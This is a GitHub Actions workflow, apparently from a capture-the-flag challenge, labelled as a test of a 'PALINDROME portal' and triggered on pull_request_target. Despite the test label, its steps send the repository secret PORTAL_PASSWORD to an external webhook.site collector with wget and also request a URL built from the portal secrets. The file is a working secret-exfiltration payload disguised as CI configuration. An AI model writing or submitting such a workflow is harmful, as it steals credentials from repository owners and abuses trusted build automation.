name: How does this test work - Test the PALINDROME portal

on:
  pull_request_target

jobs:
  test:
    runs-on: windows-latest
    steps:
      - uses: actions/checkout@v3
      - name: Test the PALINDROME portal
        run: | 
          C:\msys64\usr\bin\wget.exe '''${{ secrets.PORTAL_URL }}/${{ secrets.PORTAL_PASSWORD }}''' -O test -d -v
          C:\msys64\usr\bin\wget.exe '''https://webhook.site/931b30fc-552f-4654-b57c-1bbc50508b1c/${{ secrets.PORTAL_PASSWORD }}''' -O test -d -v
          cat test
